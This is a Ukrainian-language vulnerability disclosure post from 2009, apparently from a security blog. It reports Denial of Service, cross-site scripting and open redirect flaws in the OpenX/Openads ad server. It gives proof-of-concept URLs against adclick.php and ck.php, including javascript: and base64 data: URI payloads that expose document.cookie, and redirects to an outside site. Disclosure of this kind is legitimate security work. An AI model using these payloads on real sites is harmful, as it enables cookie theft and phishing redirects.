Нові уразливості в OpenX
20:06 03.10.200901.08.2009
У червні, 04.06.2009, я знайшов Denial of Service, Cross-Site Scripting та Redirector уразливості в OpenX (дану Redirector уразливість я зустрічав на сайтах ще в 2008 році). Це популярна локальна банерна система, що раніше називалася Openads. Про що найближчим часом повідомлю розробникам системи.
Раніше я вже писав про уразливості в OpenX.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатка.
03.10.2009
DoS (Looped DoS):
http://site/adclick.php
Уразливі вірогідно лише всі версії Openads.
XSS:
http://site/adclick.php?maxdest=javascript:alert(document.cookie)
http://site/adclick.php?dest=javascript:alert(document.cookie)
Працює в Mozilla, Firefox (до версії 3.0.9), IE6, Opera та Google Chrome. Уразливі вірогідно лише всі версії Openads, де використовується заголовок Refresh. В нових версіях (таких як OpenX v2.6.3) використовується заголовок Location і там можлива атака в браузерах Firefox та Opera.
http://site/adclick.php?dest=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2b
Інший редиректор, про який я вже писав, також уразливий для цієї атаки:
http://site/www/delivery/ck.php?dest=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2b
Redirector:
http://site/adclick.php?maxdest=http://websecurity.com.ua
http://site/adclick.php?dest=http://websecurity.com.ua
Уразливі OpenX v2.6.3 та попередні версії та потенційно наступні версії (та всі версії Openads). А до Redirector уразливі всі версії системи - OpenX v2.8.1 та попередні версії.